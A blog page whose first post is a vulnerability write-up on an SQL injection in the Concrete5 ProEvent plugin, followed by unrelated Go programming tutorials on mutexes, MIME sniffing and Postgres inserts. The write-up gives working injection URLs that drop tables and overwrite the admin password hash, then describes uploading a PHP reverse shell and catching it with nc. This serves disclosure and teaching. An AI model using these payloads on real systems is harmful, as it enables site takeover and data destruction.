Recent Posts

: Programming : Life : Economics :

Screen Shot 2016-04-13 at 2.19.51 PM

When Security Reports Go Ignored – Hacking Concrete5’s ProEvent Plugin

Posted on April 13, 2016

Overview

In this post I will walk you through the vulnerability discovery in a php plugin. This combined with some interesting side effects in Concrete5 itself, will allow us to develop an exploit to open a remote shell.

  • Concrete5.7.5.6
  • ProEvent Plugin 2.8.1
  • Ubuntu 14.04 with standard LAMP install

SQL Injection Discovery

In January of 2016 I was reviewing the ProEvent Concrete5 plugin that I had purchased and stumbled across a major vulnerability. I notified a developer on the plugin review team who had a relationship with the ProEvent plugin developer. I included two Gists. One showing the issue, the other a patch where I fixed the problem.

Months passed and I forgot about it.

On Monday I was troubleshooting a different bug I had found in Concrete5’s core. But it got me thinking, whatever happened with that SQL injection bug in the ProEvent plugin? I went and downloaded the latest version and grep’d through it. Sure enough, the vulnerability was still there.

I figured the information never was passed along. After reviewing the C5 security reporting page (which has since been updated), there wasn’t a clear path on how to report a plugin vulnerability. So I started a conversation on the forum. I wasn’t thinking it would lead to much drama. More along the lines of what someone should do next time they discover a vuln in a plugin.

What I learned really concerned me. It turns out the plugin developer was notified on February 1st but never acted on the information.

comms

There was also a response on the forums from Portland Labs stating their position on such matters.

“If it’s really bad enough, we’d absolutely pull the listing and jump through some hoops to send an email to people who might have the listing installed.”

As of today the plugin is still available and has been updated with my patch on the marketplace. I don’t know if people will be alerted so I figured I’d take the time to walk through the vulnerability and educate everyone.

Setup

Get a Linux LAMP stack setup (Ubuntu 14.04.4 for simplicity)

Install Concrete5

Screen Shot 2016-04-13 at 1.51.25 PM

Install ProEvents <=2.8.1

Screen Shot 2016-04-13 at 2.07.19 PM

 

Backup your Database

backwardselvis@c5:~$ mysqldump -uroot -p c5_pwn > c5.orig.sql
Enter password:
backwardselvis@c5:~$

Enable logging and tail the log files

backwardselvis@c5:/etc/mysql$ sudo vi my.cnf
# Both location gets rotated by the cronjob.
# Be aware that this log type is a performance killer.
# As of 5.1 you can enable the log at runtime!
general_log_file = /var/log/mysql/mysql.log
general_log = 1
backwardselvis@c5:/etc/mysql$ tail -f /var/log/mysql/mysql.log

Explore

The root of the issue is a function called eventIs(). As this is a calendaring plugin the function tries to deduce what day of the month an event falls on. It does this by using a sql query.

    /**
     * Checks a particular day and returns true or false if an event exists.
     */
    public function eventIs($date, $category, $section = null, $allday = null)
    {
        $categories = explode(', ', $category);
        $category_q = '';
        $query_params = array();
        $i = 0;
 
        if (!in_array('All Categories', $categories)) {
            foreach ($categories as $cat) {
                $cat = str_replace('&', '&', $cat);
                if ($i) {
                    $category_q .= "OR ";
                } else {
                    $category_q .= "AND (";
                }
                $category_q .= "category LIKE '%$cat%' ";
                $i++;
            }
            $category_q .= ")";
        } else {
            $category_q = '';
        }
 
        if ($section != null) {
            $section = "AND section LIKE '%$section%'";
        } else {
            $section = '';
        }
        if ($allday != null) {
            $allday = "AND allday LIKE '%$allday%'";
        } else {
            $allday = '';
        }
 
        $db = Loader::db();
 
        $events = array();
 
        $q = "SELECT * FROM btProEventDates WHERE DATE_FORMAT(date,'%Y-%m-%d') = DATE_FORMAT('$date','%Y-%m-%d') $category_q $section $allday";
        $r = $db->query($q);
 
     //...snip...

You can see that the query building portion concatenates the variables directly into the SELECT statement. This means that the statement is not prepared. Upon realizing this, I grep through the directory looking for every place this function is called.

$ grep -nr "eventIs(" ./
.//src/Models/EventList.php:505:    public function eventIs($date, $category, $section = null, $allday = null)
.//views/ajax/pro_event_list/calendar_dynamic.php:118:        if ($el->eventIs($daynum, $ctID, $section) == true) {
.//views/ajax/pro_event_list/calendar_responsive.php:156:    $ei = $el->eventIs($daynum, $ctID, $section);
.//views/ajax/pro_event_list/calendar_small.php:144:    $ei = $el->eventIs($daynum, $ctID, $section);
.//views/ajax/pro_event_list/calendar_small_array.php:160:        $ei = $el->eventIs($daynum, $ctID, $section);
$

I know that the function is defined in EventList.php so I proceed to dig into calendar_dynamic.php. Unfortunately, the values are being pulled from the database and passed to eventIs() so there isn’t any foot hold there.

Moving on…

I open up calendar_small.php and I see the following.

  $sctID = $request->get('sctID');
  $ctID = $request->get('ctID');
  $bID = $request->get('bID');

And further down.

if ($sctID != 'All Sections') {
  $section = $sctID;
}

And still further down.

  $ei = $el->eventIs($daynum, $ctID, $section);

Bingo. The values $ctID and $section are passed to eventIs() with no sanitization.

Upon installation of ProEvents all the routes get created and installed. That means that even if you don’t have the template/view for that part of the plugin activated on a page of your site, you are absolutely still vulnerable. So issuing a request to the calendar_small route will work.

Enter this into your browser or use a cli tool.

  http://172.16.21.208/index.php/proevents/routes/calendar_small?bID=163%cID=183%sctID=%27;%20drop%20table%20Users;%20select%20*%20from%20pages%20where%20cID%20=%27&year=2016&month=05&dateset=true

Makes the following appear in the mysql logs.

SELECT * FROM btProEventDates WHERE DATE_FORMAT(DATE,'%Y-%m-%d') = DATE_FORMAT('2016-05-31','%Y-%m-%d') AND (category LIKE '%%' ) AND SECTION LIKE '%'; DROP TABLE Users; SELECT * FROM pages WHERE cID ='%'

And then I can run a quick select.

backwardselvis@c5:/var/log$ mysql -uroot -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 51
Server version: 5.5.47-0ubuntu0.14.04.1-log (Ubuntu)
 
Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql> use c5_pwn;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
mysql> select * from users;
ERROR 1146 (42S02): Table 'c5_pwn.Users' doesn't exist
mysql>

SWEET! I know I can mess with the database.

Now restore the database and lets keep going.

Diving in

After this, it got me thinking, what else can I do? How about setting the password to empty.

http://172.16.21.208/index.php/proevents/routes/calendar_small?bID=163&cID=183&sctID=%27;%20update%20Users%20set%20uPassword=%27%27%20where%20uName=%27admin%27;%20select%20*%20from%20pages%20where%20cID%20=%27&year=2016&month=05&dateset=true
mysql> select uName, uEmail, uPassword from Users;
+-------+--------------------+-----------+
| uName | uEmail             | uPassword |
+-------+--------------------+-----------+
| admin | jfolkins@gmail.com |           |
+-------+--------------------+-----------+
1 row in set (0.00 sec)

What if I want to login. Lets take a bcrypted salt/hash from another installation and update the admin user’s.

http://172.16.21.208/index.php/proevents/routes/calendar_small?bID=163&cID=183&sctID=%27;%20update%20Users%20set%20uPassword=%27$2a$12$zkjyqBpTXbYmjGf7QSgqyeskvNponQ86jMWE1tqv6eCb588/MqS9u%27%20where%20uName=%27admin%27;%20select%20*%20from%20pages%20where%20cID%20=%27&year=2016&month=05&dateset=true
mysql> select uName, uEmail, uPassword from Users;
+-------+--------------------+--------------------------------------------------------------+
| uName | uEmail             | uPassword                                                    |
+-------+--------------------+--------------------------------------------------------------+
| admin | jfolkins@gmail.com | $2a$12$zkjyqBpTXbYmjGf7QSgqyeskvNponQ86jMWE1tqv6eCb588/MqS9u |
+-------+--------------------+--------------------------------------------------------------+
1 row in set (0.00 sec)

I attempt to login with user = admin and password = concretepwn. I succeed.

Lets go deeper

I can login! But now what? Unfortunately Concrete5 only allows you to download plugins from their marketplace. So unlike wordpress where I could directly manipulate the php files, I don’t appear to be able to do that here. But I do find something interesting.

On the allowed file upload screen I append the php filetype to the end.
Screen Shot 2016-04-13 at 2.07.19 PMI then upload a standard php reverse shell script.

Screen Shot 2016-04-13 at 2.07.19 PM

I run the url in the browser.

http://172.16.21.208/application/files/1614/6059/6987/jpwn.php
➜  ~ sudo nc -l 172.16.21.1 11234
Linux c5 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 18:34:50 up  4:34,  2 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
backward pts/0    172.16.21.1      14:01    1:50m  0.82s  0.02s sshd: backwardselvis [priv]
backward pts/3    172.16.21.1      16:51    2:10   0.16s  0.16s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

SHELL!

Events

  • Notification sent to plugin developer on February 1st 2016
  • Developer ignore’s report
  • Forum post initiated on April 11th, 2016
  • Developer silently applied the supplied patch, verbatim, on April 13th 2016
  • No communication to the plugin’s user base has been sent
  • CVE was denied because the vendor isn’t supported
  • Concrete5’s marketplace only reviews the initial plugin. Subsequent reviews for updates are not performed. Buyer beware.

Conclusion

This shows what you can do when you find one vulnerability. Chaining the other weak points (same password hashing scheme, file uploads executable) allowed me to own a standard LAMP ubuntu install.

It also is a reminder to me that you can’t depend on people to update their code. Best to cast some light on things and get everything out in the open.

 

Understanding When To Use Channels Or Mutexes In Go

Problem Domain

Community “Share Memory By Communicating”
Interpretation “CHANNEL ALL TEH THINGZ!”

Because many developers come from backgrounds (Php, Ruby, Perl, Python) where unlike Go, concurrency is not a first class citizen, they struggle when learning about it. But they apply themselves and take the time to dig into Go’s concurrency model. And just as they finally feel they’ve come to grips, something painful happens. The developer decides to use their new found super-power (goroutines + channels) for absolutely everything and it suddenly becomes an anti-pattern.

External Confirmation

I’m not the only one who has noticed. In the discussion below Andrew warns about the overuse of channels to keep state in goroutines.

“Hey, concurrency is great, but all this needs is a mutex”

Also, in the following interview between Andrew and Dave. Andrew asks Dave to give an example of when he wrote some bad code and Dave mentions specifically about using too many channels.

“…and I tried to use channels for everything, if you want to talk about worst code…”

Confession

When I created BadActor, I needed it to help me in identify malicious activities against my systems so that I could respond to them. I set out to solve my problem (and gain proficiency with Go) and I envisioned this grand design where everything was a goroutine and communication would happen only through channels and I would never need another mutex ever again. (Hah!)

It sounded great in theory. But the composition was cumbersome and holy crap did the Benchmarks suck. I didn’t think too much of this. I thought that it was just me misunderstanding on how to use channels in Go. So I hunkered down and persisted with my design for a while until I learned better. When I realized my error, I rewrote large portions of my codebase.

Coding Horror

Below is an old commit of BadActor‘s where originally I had architected the exact model that Andrew and Dave spoke about. Many goroutines, each with their own channel(s), combined with message types to define the behavior of the communication. I leave them here so you can hopefully learn from my mistake.

Here is the Actor’s goroutine with its open channel.

func (a *Actor) Run() {
	go func() {
		for {
			select {
			case in := <-a.Incoming:
				a.switchBoard(in)
			default:
				a.overwatch()
			}
		}
	}()
}

And here is the awkward Type checking that Andrew warns about.

func (a *Actor) switchBoard(in *Incoming) {
	switch in.Type {
	case KEEP_ALIVE:
		err := a.rebaseAll()
		in.Outgoing <- &Outgoing{Error: err}
	case INFRACTION:
		err := a.infraction(in.RuleName)
		in.Outgoing <- &Outgoing{Error: err}
	case CREATE_INFRACTION:
		err := a.createInfraction(in.Infraction)
		in.Outgoing <- &Outgoing{Error: err}
	case STRIKES:
		total := a.strikes(in.RuleName)
		in.Outgoing <- &Outgoing{Message: strconv.Itoa(total)}
	case IS_JAILED:
		res := a.isJailed()
		in.Outgoing <- &Outgoing{Message: strconv.FormatBool(res), Error: nil}
	case IS_JAILED_FOR:
		res := a.isJailedFor(in.RuleName)
		in.Outgoing <- &Outgoing{Message: strconv.FormatBool(res), Error: nil}
	}
}

Practical Example – Mutex

If I synchronously need to solve for (x) and I just have one input, then I protect it with a mutex. I do not implement channels and goroutines just to protect the state of some asset.

Example: A cache takes one key (k) to gather one value (x).

Below is a very naive cache and http server I created to help you understand.

We start by creating our main.go file.

$ vi main.go

Then we import the needing packages (thanks goimport).

package main
 
import (
  "fmt"
  "html"
  "log" 
  "net/http"
  "net/url"
  "sync"
)

Next we define our NaiveCache and define some getter/setter methods.

//
// NaiveCache
//
 
var c *NaiveCache
 
type NaiveCache struct {
  mu      sync.Mutex
  storage map[string]string
}
 
func (c *NaiveCache) Value(k string) (string, error) {
  var v string
  c.mu.Lock()
  defer c.mu.Unlock()
  if v, ok := c.storage[k]; ok {
    return v, nil
  }
  return v, fmt.Errorf("Value Not Found")
}
 
func (c *NaiveCache) SetValue(k string, v string) {
  c.mu.Lock()
  c.storage[k] = v
  c.mu.Unlock()
  return
}

Here we implement the server giving it a handler and two helper functions, get() and post().

//
// Server
//
func NaiveCacheHandler(w http.ResponseWriter, r *http.Request) {
  switch r.Method {
  case "GET":
    get(w, r)
  case "POST":
    post(w, r)
  }
}
 
func get(w http.ResponseWriter, r *http.Request) {
  id, err := url.QueryUnescape(r.URL.Query().Get("key"))
  if err != nil {
    w.WriteHeader(http.StatusBadRequest)
    b := []byte(fmt.Sprintf("%v StatusBadRequest", http.StatusBadRequest))
    w.Write(b)
    return
  }
 
  v, err := c.Value(id)
  if err != nil {
    w.WriteHeader(http.StatusNotFound)
    b := []byte(fmt.Sprintf("%v StatusNotFound", http.StatusNotFound))
    w.Write(b)
    return
  }
 
  w.Write([]byte(html.EscapeString(v)))
  return
}
 
func post(w http.ResponseWriter, r *http.Request) {
  k := html.EscapeString(r.FormValue("key"))
  v := html.EscapeString(r.FormValue("value"))
  if len(k) == 0 || len(v) == 0 {
    w.WriteHeader(http.StatusBadRequest)
    b := []byte(fmt.Sprintf("%v StatusBadRequest", http.StatusBadRequest))
    w.Write(b)
    return
  }
 
  c.SetValue(k, v)
  w.WriteHeader(http.StatusOK)
  b := []byte(fmt.Sprintf("%v StatusOK", http.StatusOK))
  w.Write(b)
  return
}

Ending with the main function which gets called upon running our compiled application.

//
// Main
//
func main() {
  // init the cache
  c = &NaiveCache{storage: make(map[string]string)}
 
  // start the server
  http.HandleFunc("/cache", NaiveCacheHandler)
  log.Fatal(http.ListenAndServe(":9090", nil))
}

Run the application.

$ go run main.go

And submit some curl requests to see it work.

$ curl -X GET http://localhost:9090/cache\?key\=somekey
404 StatusNotFound
$ curl --data "key=somekey&value=somevalue" http://localhost:9090/cache
200 StatusOK
$ curl -X GET http://localhost:9090/cache\?key\=somekey
somevalue
$ curl -X GET http://localhost:9090/cache\?key\=somekey
somevalue
$

Closing

Don’t worry about failing, everyone learns when they fail so go ahead and dive in and start building something in Go. But remember, if you feel like you are fighting your design and you notice that you are primarly using channels to protect state, then hey, concurrency is great, but all you need is a mutex.

How to get punched in the face by Go’s Standard Library (and arguably my own stupidity)

Posted on June 23, 2014

Ever have one of those days? A “I forgot to add a semi colon to terminate a line” type of day? Yeah, me too. And today was one of them.

Many developers, when allowing user uploaded data, tend to trust the web browser’s headers a little too much. I prefer to use MIME Type sniffing on the actual binary stream. This gives me a greater level of assurance that I’m not allowing a user to upload a different type of file than the one I desire. Say an executable binary with which to do my application damage.

I’ve been using using the net/http/sniff/DetectContentType function in the Go standard library to do this type of detection on images.

func ValidateImageType(b []byte) (string) {
  m := http.DetectContentType(b)
  switch m { 
  case "image/jpeg":
    return "jpg"
  case "image/png":
    return "png"
  case "image/gif":
    return "gif"
  }
  return ""
}

It works wonderfully.

Today I figured I’d implement mp4 detection so as to detect videos. I snagged a video file off of my Note 2 and created a quick test.

func ValidateVideoType(b []byte) (string) {
  m := http.DetectContentType(b)
  switch m { 
  case "video/mp4":
    return "mp4"
  }
  return ""
}

This didn’t work and I headed over to the documentation. After reading the function’s signature, I was pretty sure I was using it correctly. Suspecting that my mp4 was corrupt I went and opened up the file in a hex editor.

mp4_hexadecimal

Comparing it to the living specification, it appeared correct. But just in case the file was in fact corrupt, I went out and found a test mp4 file from Apple.com. Unfortunately this file also failed.

Knowing that I was using the function correctly, and that the file was intact, I headed over to review the sniff.go source file.

package main
 
import (
  "encoding/binary"
  "bytes"
  "log"
  "os"
  "io"
  "net/http"
)
 
func main() {
  var total int
  var ext string
  buf := make([]byte, 512)
 
  fi, err := os.Open("./sample_mpeg4.mp4")
  if err != nil {
    panic(err)
  }
  defer fi.Close()
 
  for {
    n, err := fi.Read(buf)
    total = total + n
    if n == 0 {
      break
    }
    if err == io.EOF {
      break
    }
    if err != nil {
      break
    }
 
    if n == 512 {
 
      data := buf[:n]
      if len(data) &lt; 8 {
        break
      }
 
      boxSize := int(binary.BigEndian.Uint32(data[:4]))
      if boxSize%4 != 0 {
        break
      }
      if len(data) &lt; boxSize {
        break
      }
      if !bytes.Equal(data[4:8], []byte("ftyp")) {
        break
      }
 
      for st := 8; st &lt; boxSize; st+=4 {
        if st == 12 {
          continue
        }
        seg := string(data[st : st+3])
        switch seg {
          case"mp4", "iso", "M4V", "M4P", "M4B":
            ext = "mp4"
        }
        if len(ext) &gt; 1 {
          break
        }
      }
 
      m := http.DetectContentType(buf)
      log.Println("LOCAL: ", ext)
      log.Println("SOURCE: ", m)
    }
  }
}

Bizarrely, the local version found the desired file type. Wuuuuuuuu?!?

I wondered if it was my OSX environment so I spun up a linux box, downloaded the Go source, and dove into the source code.

Making sure I was at least starting off in the right direction, I ran the bash script go/src/all.bash and all the tests completed successfully. I went to the sniff_test.go file and found this test dataset commented out.

        //{"MP4 video", []byte("\x00\x00\x00\x18ftypmp42\x00\x00\x00\x00mp42isom&lt;\x06t\xbfmdat"), "video/mp4"},

Hmmmmm, that looked interesting. So I uncommented the code and ran the tests again. THEY FAILED! It wasn’t what I wanted, but at this point I’ll take anything.

Knowing I was close I did a recursive grep for the function signature in question to see what was using it.

backwardselvis@lts-linux:~/go/src$ grep -nr "mp4Sig" ./
./pkg/net/http/sniff.go:102:	//mp4Sig(0),
./pkg/net/http/sniff.go:164:type mp4Sig int
./pkg/net/http/sniff.go:166:func (mp4Sig) match(data []byte, firstNonWS int) string {
backwardselvis@lts-linux:~/go/src$

And immediately, my face struck my palm and my head hit my keyboard.

I opened up sniff.go. The EXACT SAME FILE that I’d been staring at all day and uncommented line 102. Saved, quit, and upon running the tests again they all passed successfully.

So there you have it. An unimplemented feature and traversing old VC subtrees leads to a bad day. Make sure you actually review the source you are working on.

:peace

2013-10-29 07.27.37

How To: Shove data into Postgres using Goroutines(Gophers) and GoLang

After watching Rob Pike’s wonderful golang talk, ‘Concurrency Is Not Parallelism’, in which he uses the analogy of having many Gophers running around and getting work done. I realized that I wanted to program a test so as better to solidify the concept.

Rob Pike – ‘Concurrency Is Not Parallelism’

Recently a pain point for me while using Play! and Scala was finding a fast way to insert data into a Postgres Database. My solution was fine but I felt it could be simpler, nay I would even say that ideally it SHOULD be simpler. I decided to see how golang would handle this type of problem.

Please install golang 1.2 and postgres 9.3.1 on a 10.9 OSX machine.

We will then create a database with one table.

$ initdb ~/Programming/postgres-E utf8
$ pg_ctl -D ~/Programming/postgres -l ~/logfile start
$ createdb testdb
$ psql testdb
testdb=# create table test ( gopher_id int, created timestamp );

Next, create a file called test_one.go with my provided code.. Our goal right now is to simply get data to insert into the database. I should mention that I planned to have many goroutines (or as Rob says, gophers) inserting data into my testdb so the column gopher_id was in preparation for this.

package main
 
import (
  //"os"
  "log"
  "time"
  "fmt"
  "database/sql"
  _ "github.com/lib/pq"
)
 
func main() {
  // create the statement string
  var sStmt string = "insert into test (gopher_id, created) values ($1, $2)"
 
  // lazily open db (doesn't truly open until first request)
  db, err := sql.Open("postgres","host=localhost dbname=testdb sslmode=disable")
  if err != nil {
    log.Fatal(err)
  }
 
  stmt, err := db.Prepare(sStmt)
  if err != nil {
    log.Fatal(err)
  }
 
  fmt.Printf("StartTime: %v\n", time.Now())
 
  res, err := stmt.Exec(1, time.Now())
  if err != nil || res == nil {
    log.Fatal(err)
  }
 
  // close statement
  stmt.Close()
 
  // close db
  db.Close()
 
  fmt.Printf("StopTime: %v\n", time.Now())
}

Run it and take a look at the results.

$ go build test_one.go 
$ ./test_one 
StartTime: 2013-10-28 19:37:11.014548615 -0700 PDT
StopTime: 2013-10-28 19:37:11.01744029 -0700 PDT
$

Yay! We have inserted exactly one row into the database.

Lets modify our program to insert a 100,000 rows using a simple for loop.

package main
 
import (
  "os"
  "log"
  "time"
  "fmt"
  "database/sql"
  _ "github.com/lib/pq"
)
 
func main() {
  // create the statement string
  var sStmt string = "insert into test (gopher_id, created) values ($1, $2)"
  var entries int = 100000
 
  // lazily open db (doesn't truly open until first request)
  db, err := sql.Open("postgres","host=localhost dbname=testdb sslmode=disable")
  if err != nil {
    log.Fatal(err)
  }
 
  fmt.Printf("StartTime: %v\n", time.Now())
  for i := 0; i &lt; entries; i++ {
 
    stmt, err := db.Prepare(sStmt)
    if err != nil {
      log.Fatal(err)
    }
 
    res, err := stmt.Exec(1, time.Now())
    if err != nil || res == nil {
      log.Fatal(err)
    }
 
    // close statement
    stmt.Close()
  }
 
  // close db
  db.Close()
 
  fmt.Printf("StopTime: %v\n", time.Now())
  os.Exit(0)
}

And the results after running it.

$ ./test_one 
StartTime: 2013-10-28 19:53:55.397246856 -0700 PDT
StopTime: 2013-10-28 19:54:30.471278797 -0700 PDT
$

Ok. It took 35 seconds to insert a simple timestamp 100,000 times.

Now here is where we want to mix things up a bit. Rob mentions this thing called a goroutine in his talk. What would happen if we used 10 goroutines to insert 10,000 records each. It should be faster right?

Here is my test_many.go application, copy it.

package main
 
// schema we can use along with some select statements
// create table test ( gopher_id int, created timestamp );
// select * from test order by created asc limit 1;
// select * from test order by created desc limit 1;
// select count(created) from test;
 
import (
  "log"
  "time"
  "fmt"
  "database/sql"
  _ "github.com/lib/pq"
)
 
const (
  gophers = 10
  entries = 10000
)
 
func main() {
 
  // create string to pass
  var sStmt string = "insert into test (gopher_id, created) values ($1, $2)"
 
  // run the insert function using 10 go routines
  for i := 0; i &lt; gophers; i++ {
    // spin up a gopher
    go gopher(i, sStmt)
  }
 
  // this is a simple way to keep a program open
  // the go program will close when a key is pressed
  var input string
  fmt.Scanln(&amp;input)
}
 
func gopher(gopher_id int, sStmt string) {
 
  // lazily open db (doesn't truly open until first request)
  db, err := sql.Open("postgres","host=localhost dbname=testdb sslmode=disable")
  if err != nil {
    log.Fatal(err)
  }
 
  fmt.Printf("Gopher Id: %v || StartTime: %v\n",gopher_id, time.Now())
 
  for i := 0; i &lt; entries; i++ {
 
    stmt, err := db.Prepare(sStmt)
    if err != nil {
      log.Fatal(err)
    }
 
    res, err := stmt.Exec(gopher_id, time.Now())
    if err != nil || res == nil {
      log.Fatal(err)
    }
 
    stmt.Close()
 
  }
  // close db
  db.Close()
 
  fmt.Printf("Gopher Id: %v || StopTime: %v\n",gopher_id, time.Now())
 
}

Compile and run it. And here are the results.

$ go build test_many.go
$ ./test_many 
Gopher Id: 0 || StartTime: 2013-10-28 20:33:22.756366002 -0700 PDT
Gopher Id: 1 || StartTime: 2013-10-28 20:33:22.756647643 -0700 PDT
Gopher Id: 2 || StartTime: 2013-10-28 20:33:22.756794146 -0700 PDT
Gopher Id: 3 || StartTime: 2013-10-28 20:33:22.756918631 -0700 PDT
Gopher Id: 4 || StartTime: 2013-10-28 20:33:22.757068214 -0700 PDT
Gopher Id: 5 || StartTime: 2013-10-28 20:33:22.757215735 -0700 PDT
Gopher Id: 6 || StartTime: 2013-10-28 20:33:22.757371258 -0700 PDT
Gopher Id: 7 || StartTime: 2013-10-28 20:33:22.757492378 -0700 PDT
Gopher Id: 8 || StartTime: 2013-10-28 20:33:22.757640434 -0700 PDT
Gopher Id: 9 || StartTime: 2013-10-28 20:33:22.758553529 -0700 PDT
Gopher Id: 5 || StopTime: 2013-10-28 20:33:31.466897188 -0700 PDT
Gopher Id: 7 || StopTime: 2013-10-28 20:33:31.473265074 -0700 PDT
Gopher Id: 0 || StopTime: 2013-10-28 20:33:31.475096903 -0700 PDT
Gopher Id: 4 || StopTime: 2013-10-28 20:33:31.485587389 -0700 PDT
Gopher Id: 6 || StopTime: 2013-10-28 20:33:31.500614304 -0700 PDT
Gopher Id: 3 || StopTime: 2013-10-28 20:33:31.5006651 -0700 PDT
Gopher Id: 8 || StopTime: 2013-10-28 20:33:31.501664917 -0700 PDT
Gopher Id: 1 || StopTime: 2013-10-28 20:33:31.510199788 -0700 PDT
Gopher Id: 2 || StopTime: 2013-10-28 20:33:31.522350833 -0700 PDT
Gopher Id: 9 || StopTime: 2013-10-28 20:33:31.523710669 -0700 PDT
 
$

Nice! Roughly 9 seconds for 100,000 records.

Lets change our test_many.go application to insert 1,000,000 records. Simply as a way to keep the application running longer.

...snip...
 
const (
  gophers = 10
  entries = 100000
)
 
...snip...

Now go ahead and build the application and run it.

Then in another terminal window, open up top and search for the test_many command.

PID    COMMAND      %CPU TIME     #TH   #WQ  #PORT #MREGS MEM    RPRVT  PURG   CMPRS  VPRVT  VSIZE  PGRP  PPID  STATE    UID       FAULTS    COW     MSGSENT    MSGRECV
89478  test_many    0.0  00:12.39 15    0    84    1448   140M   139M   0B     0B     358M   139G   89478 88263 sleeping 672251097 36630     95      110        51

You will see that under the #TH column that our application, test_many, has 15 threads open. 10 of these, are the threads we created using our goroutine. 

UPDATE: That statement was not true. I’ve learned after working with go that while using goroutines, threads are dynamically assigned. It is not a 1 to 1 correlation.

However, Rob does have a talk where he mentions some more details. At minute 8:56 he writes

“But if you think of it as a very cheap thread, you won’t be far off”

 

Anyway, this is the section of the test_many.go file where the magic happens.

...snip...
 
  for i := 0; i &lt; gophers; i++ {
    // spin up a gopher
    go gopher(i, sStmt)
  }
 
...snip...

You see, simply by placing the “go” call in front of our gopher function, we allow golang to do a bunch of behind the scenes awesomeness. A part of this gain, is an inexpensive and versatile thread and memory manager. This is pretty sweet.

As the last test, here is 20 gophers inserting a million rows into our database.

Change the needed constants.

...snip...
 
const (
  gophers = 20
  entries = 50000
)
 
...snip...

Then recompile and run our application.

$ ./test_many 
Gopher Id: 0 || StartTime: 2013-10-30 14:40:51.619452739 -0700 PDT
Gopher Id: 1 || StartTime: 2013-10-30 14:40:51.619757831 -0700 PDT
Gopher Id: 2 || StartTime: 2013-10-30 14:40:51.619896348 -0700 PDT
Gopher Id: 3 || StartTime: 2013-10-30 14:40:51.620059076 -0700 PDT
Gopher Id: 4 || StartTime: 2013-10-30 14:40:51.620283647 -0700 PDT
Gopher Id: 5 || StartTime: 2013-10-30 14:40:51.620410941 -0700 PDT
Gopher Id: 6 || StartTime: 2013-10-30 14:40:51.620550967 -0700 PDT
Gopher Id: 7 || StartTime: 2013-10-30 14:40:51.620693553 -0700 PDT
Gopher Id: 8 || StartTime: 2013-10-30 14:40:51.62085492 -0700 PDT
Gopher Id: 9 || StartTime: 2013-10-30 14:40:51.62177397 -0700 PDT
Gopher Id: 10 || StartTime: 2013-10-30 14:40:51.621900208 -0700 PDT
Gopher Id: 11 || StartTime: 2013-10-30 14:40:51.622068806 -0700 PDT
Gopher Id: 12 || StartTime: 2013-10-30 14:40:51.622233856 -0700 PDT
Gopher Id: 13 || StartTime: 2013-10-30 14:40:51.622374732 -0700 PDT
Gopher Id: 14 || StartTime: 2013-10-30 14:40:51.622520823 -0700 PDT
Gopher Id: 15 || StartTime: 2013-10-30 14:40:51.622663899 -0700 PDT
Gopher Id: 16 || StartTime: 2013-10-30 14:40:51.6228063 -0700 PDT
Gopher Id: 17 || StartTime: 2013-10-30 14:40:51.62294893 -0700 PDT
Gopher Id: 18 || StartTime: 2013-10-30 14:40:51.623085432 -0700 PDT
Gopher Id: 19 || StartTime: 2013-10-30 14:40:51.623231574 -0700 PDT
Gopher Id: 3 || StopTime: 2013-10-30 14:42:35.551828109 -0700 PDT
Gopher Id: 6 || StopTime: 2013-10-30 14:42:35.619763694 -0700 PDT
Gopher Id: 17 || StopTime: 2013-10-30 14:42:35.642630072 -0700 PDT
Gopher Id: 4 || StopTime: 2013-10-30 14:42:35.660139502 -0700 PDT
Gopher Id: 10 || StopTime: 2013-10-30 14:42:35.67527849 -0700 PDT
Gopher Id: 13 || StopTime: 2013-10-30 14:42:35.685175774 -0700 PDT
Gopher Id: 9 || StopTime: 2013-10-30 14:42:35.69144017 -0700 PDT
Gopher Id: 0 || StopTime: 2013-10-30 14:42:35.729137844 -0700 PDT
Gopher Id: 1 || StopTime: 2013-10-30 14:42:35.749108884 -0700 PDT
Gopher Id: 2 || StopTime: 2013-10-30 14:42:35.770752277 -0700 PDT
Gopher Id: 7 || StopTime: 2013-10-30 14:42:35.777471603 -0700 PDT
Gopher Id: 8 || StopTime: 2013-10-30 14:42:35.780713859 -0700 PDT
Gopher Id: 19 || StopTime: 2013-10-30 14:42:35.783338736 -0700 PDT
Gopher Id: 11 || StopTime: 2013-10-30 14:42:35.794922546 -0700 PDT
Gopher Id: 14 || StopTime: 2013-10-30 14:42:35.799124142 -0700 PDT
Gopher Id: 5 || StopTime: 2013-10-30 14:42:35.800538715 -0700 PDT
Gopher Id: 12 || StopTime: 2013-10-30 14:42:35.802006822 -0700 PDT
Gopher Id: 18 || StopTime: 2013-10-30 14:42:35.806211023 -0700 PDT
Gopher Id: 16 || StopTime: 2013-10-30 14:42:35.817042445 -0700 PDT
Gopher Id: 15 || StopTime: 2013-10-30 14:42:35.824304999 -0700 PDT

With a tiny golang program, we now have 1 million writes taking 1 minute and 44 seconds. Friggin sweet.

UPDATE2: Thanks to corvinusz for pointing this out. By simply moving our prepare request outside of our for loop. We can now insert 1M records in 44 seconds. Thanks dude!

 
...snip...
 
func gopher(gopher_id int, sStmt string) {
 
  // lazily open db (doesn't truly open until first request)
  db, err := sql.Open("postgres","host=localhost dbname=testdb sslmode=disable")
  if err != nil {
    log.Fatal(err)
  }
 
  stmt, err := db.Prepare(sStmt)
  if err != nil {
    log.Fatal(err)
  }
 
  fmt.Printf("Gopher Id: %v \t|| StartTime: %v\n",gopher_id, time.Now())
 
 
  for i := 0; i < entries; i++ {
 
 
    res, err := stmt.Exec(gopher_id, time.Now())
    if err != nil || res == nil {
      log.Fatal(err)
    }
 
 
  }
 
  stmt.Close()
  // close db
  db.Close()
 
  fmt.Printf("Gopher Id: %v \t|| StopTime: %v\n",gopher_id, time.Now())
 
}
 
...snip...
$ ./test_many_pool 
